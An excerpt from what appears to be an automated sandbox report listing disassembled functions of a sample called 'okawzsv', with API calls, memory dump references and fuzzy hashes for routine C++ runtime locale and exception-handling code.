                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 4b4936a009e48f79f676776f90f3432ed098d4c54e9df08cd65d9b4d83747f25
                                                                                                                        • Instruction ID: dc8dd27c791502aeb4cafd4e8be63cfba456a664f91fc5ef5c93dd8d2627ea6c
                                                                                                                        • Opcode Fuzzy Hash: 4b4936a009e48f79f676776f90f3432ed098d4c54e9df08cd65d9b4d83747f25
                                                                                                                        • Instruction Fuzzy Hash: 0EE0B676250208ABDF11AFA4FC46FA93BE5BB84B11F555421B9084A5A0C3B6B5A09B48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00414DFA Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,0041A624,?,0041A624,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00414E21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: a4c5e6812832621e5ea1910772ee014cd510767be264fb3d1d1197172fb578ac
                                                                                                                        • Instruction ID: ed81224b7b6a2bca46349e82032c7f04a825ce0310787a85c4bfcc61349feb8c
                                                                                                                        • Opcode Fuzzy Hash: a4c5e6812832621e5ea1910772ee014cd510767be264fb3d1d1197172fb578ac
                                                                                                                        • Instruction Fuzzy Hash: D0D01732000248BF8F01AFD0FC06CAA3BA9FB88324B040415F90845120C736A4709B28
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004130E4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004130EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 97cdd1ee242ed5aeb214d00779ec855d0877c71e4ca47ade67693b9d5922d8d7
                                                                                                                        • Instruction ID: c15825806576fb3e759ae02071777ca406dee315423515d10ecee66220ed4e05
                                                                                                                        • Opcode Fuzzy Hash: 97cdd1ee242ed5aeb214d00779ec855d0877c71e4ca47ade67693b9d5922d8d7
                                                                                                                        • Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088883F2CEA002A0B808030FA0C00022ABA2A822AA88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004168A7 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(0041067B,0042E4C8,00000014), ref: 004168A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: c2f420e7a6fcd30a75d8fce588d7697191e29a1ce90c6f75a285d5c02a85b7ad
                                                                                                                        • Instruction ID: 41de22d69d8f1a9191e3809705f0bf5e6bb174a1c37b0007c9f261bdccfa4f75
                                                                                                                        • Opcode Fuzzy Hash: c2f420e7a6fcd30a75d8fce588d7697191e29a1ce90c6f75a285d5c02a85b7ad
                                                                                                                        • Instruction Fuzzy Hash: 55B012F03071428787084F387C9920D36D46B08213351007D7007C1170DF20C450AA0C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F017B Relevance: .1, Instructions: 60COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction ID: 050eeb8071cc1429f69714460f97878f852eef65a43a5266e2420fe67a52adc2
                                                                                                                        • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                                                                                                        • Instruction Fuzzy Hash: 7611A036600119AFC720EF69C8809BAB7E9EF947A47048016FD54CB312E739ED81C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F013E Relevance: .0, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction ID: 746fb29b7c6769914f9bdda8f0933d3977a54e746f1859c428c3ae64fdc60ded
                                                                                                                        • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                                                                                                        • Instruction Fuzzy Hash: 49E09A35264148EFCB00CBA8CE81D25B3F8EB08320B140291FA25C73A2EA38EE00DA54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F0109 Relevance: .0, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction ID: 803d4eafe10d04380a11153d8f1901027966101e9ae7b468443b54c04b356c24
                                                                                                                        • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                                                                                                        • Instruction Fuzzy Hash: D9E04F322106189BC7719B5ACA40DA7F7E8EBC87B0B594426EE8997612C236FC01C794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F005F Relevance: .0, Instructions: 7COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403A90 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00403A9E
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AA9
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AB4
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403ABF
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403ACA
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AD5
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AE0
                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 00403AF3
                                                                                                                          • Part of subcall function 00403E90: std::exception::exception.LIBCMT ref: 00403E9E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403B01
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403B0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarn$std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID: bad locale name
                                                                                                                        • API String ID: 747793647-1405518554
                                                                                                                        • Opcode ID: cc551e127de3a2cd77c308696d2c628c746ac2099f56c90b745b4e668e887d71
                                                                                                                        • Instruction ID: 3a41833131820623e3360e0a2c365f6045fcb50588cc8f7903fdc20afb8ce1d1
                                                                                                                        • Opcode Fuzzy Hash: cc551e127de3a2cd77c308696d2c628c746ac2099f56c90b745b4e668e887d71
                                                                                                                        • Instruction Fuzzy Hash: 69019E30A00108EBDB08EF95D992A6D7779AF40709F54056EE502372C2DE386F149759
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004085D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00408604
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                        • Opcode ID: 095c778286030ddf1f39e050fa46c2539d89f0176b6456a287d68998bc704e40
                                                                                                                        • Instruction ID: 7952489c123dc5d280b15e348ececa5c6b2e4747948209149beb5f84c107d689
                                                                                                                        • Opcode Fuzzy Hash: 095c778286030ddf1f39e050fa46c2539d89f0176b6456a287d68998bc704e40
                                                                                                                        • Instruction Fuzzy Hash: 7821B130A00208EBCB14DB91E982FAEB374BF40700F65846EA5117B2C1DA79AE05DB4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004059C0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 404COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strcspnctype$_localeconvstd::ios_base::width
                                                                                                                        • String ID: @$`gB$`gB
                                                                                                                        • API String ID: 4159833505-742010302
                                                                                                                        • Opcode ID: a986c5b67f102994afda9544e43b04955c9acb4efee2bb822a4eb5d51c7475b9
                                                                                                                        • Instruction ID: 010c020e6cf52a58f97a234e92f7860b2830957bbb357596f8136ef6bf8641f5
                                                                                                                        • Opcode Fuzzy Hash: a986c5b67f102994afda9544e43b04955c9acb4efee2bb822a4eb5d51c7475b9
                                                                                                                        • Instruction Fuzzy Hash: C9F1F8B5900109ABCB08DF99D991AEFB7B5FF88304F14816EF505AB291D738AE40CF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040CF09 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040CF10
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CF1A
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040CF31
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040CF3A
                                                                                                                        • codecvt.LIBCPMT ref: 0040CF54
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040CF68
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040CF76
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040CF8C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exceptionstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1757418035-3145022300
                                                                                                                        • Opcode ID: 3cb3a74f8e4f506f0c1d3f82f69251a16fccd7f1ddd4eed735db568ccc0c535f
                                                                                                                        • Instruction ID: 19f7fe5675ce0e5978de3ff8e6462b91015e0e19ef9fc73de280713c8d44387f
                                                                                                                        • Opcode Fuzzy Hash: 3cb3a74f8e4f506f0c1d3f82f69251a16fccd7f1ddd4eed735db568ccc0c535f
                                                                                                                        • Instruction Fuzzy Hash: 7701A172A00125EBCB01EBA0D882AAE7364AF44718F10467FF5117B2D1CB3C9D048B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403040 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040304B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040305D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040306C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: X3C$bad cast
                                                                                                                        • API String ID: 1593993370-2230144185
                                                                                                                        • Opcode ID: 4da0f230d056abf04e62b398d5266f196784bc72ebfa4069f42f0cd97be51fe9
                                                                                                                        • Instruction ID: 55690cea464c4dbb2c7cfbb3d66d12b7f2b94a0abb7bb9d2a3c4c5dc0e74c2fd
                                                                                                                        • Opcode Fuzzy Hash: 4da0f230d056abf04e62b398d5266f196784bc72ebfa4069f42f0cd97be51fe9
                                                                                                                        • Instruction Fuzzy Hash: 7C212C74E00108EBCB04DF94D9919AEBBB4AB48305F2082BAE90577381DB35AF41DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402E00 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402E0B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402E1D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402E2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast$d3C
                                                                                                                        • API String ID: 1593993370-4251626575
                                                                                                                        • Opcode ID: 3a86281c92186e7b335341803651f954b2c3724d4880b640c3c5bed5166a739a
                                                                                                                        • Instruction ID: 1530d595243c9370b8b92e9043dde409adc899d4696ee514b7f5e55f32978647
                                                                                                                        • Opcode Fuzzy Hash: 3a86281c92186e7b335341803651f954b2c3724d4880b640c3c5bed5166a739a
                                                                                                                        • Instruction Fuzzy Hash: 61212C74D00208EBCB04DFA4D985AAEB7B0AB48304F2081BAE915773D1DB78AF40CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040310B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040311D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040312C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: `3C$bad cast
                                                                                                                        • API String ID: 1593993370-2529692739
                                                                                                                        • Opcode ID: 8baf8d84d8f509ad206477f4294b2497a331954686ef592380c7d5d8d2fe544e
                                                                                                                        • Instruction ID: bbe032f1b406c17f45b64794562d7dc04279e42c4a88ada5befe02f2ea74e629
                                                                                                                        • Opcode Fuzzy Hash: 8baf8d84d8f509ad206477f4294b2497a331954686ef592380c7d5d8d2fe544e
                                                                                                                        • Instruction Fuzzy Hash: 4B21CD74D00108EBCB04DFA5D9819EEB7B5AB48305F2082BAE515773D1DB385F44DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402EC0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402ECB
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402EDD
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402EEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1593993370-3145022300
                                                                                                                        • Opcode ID: b035913ce5c65f0acd8cf6863cd217db0b5de48ab6ef34d05d06a22902111699
                                                                                                                        • Instruction ID: 21ed68f73c1e94b83709bc9fba53b6b65c7cbb65d230ed01b1b0ffca5846ae76
                                                                                                                        • Opcode Fuzzy Hash: b035913ce5c65f0acd8cf6863cd217db0b5de48ab6ef34d05d06a22902111699
                                                                                                                        • Instruction Fuzzy Hash: 7B212C74D00209EBCB04DFA4D985AAEB7B0EB48304F2081BAE915773C1DB74AF40DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402F80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402F8B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402F9D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402FAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1593993370-3145022300
                                                                                                                        • Opcode ID: 00d6910303ace36632adcdb45d9fb62738e97d0be1a976c6303b2dc0169dee16
                                                                                                                        • Instruction ID: bdd014f9d6285fea9febaa0a79cf14112ea20f29fdb61fe9ff84341db7ec45c5
                                                                                                                        • Opcode Fuzzy Hash: 00d6910303ace36632adcdb45d9fb62738e97d0be1a976c6303b2dc0169dee16
                                                                                                                        • Instruction Fuzzy Hash: 5921FC74E00109EBCB04DF94D9819EEB7B4AB48305F2082BAE505773D1DB78AF41DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040C3A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ____lc_codepage_func.LIBCMT ref: 0040C3A6
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040C3B7
                                                                                                                          • Part of subcall function 004120B3: __calloc_impl.LIBCMT ref: 004120C2
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040C3CA
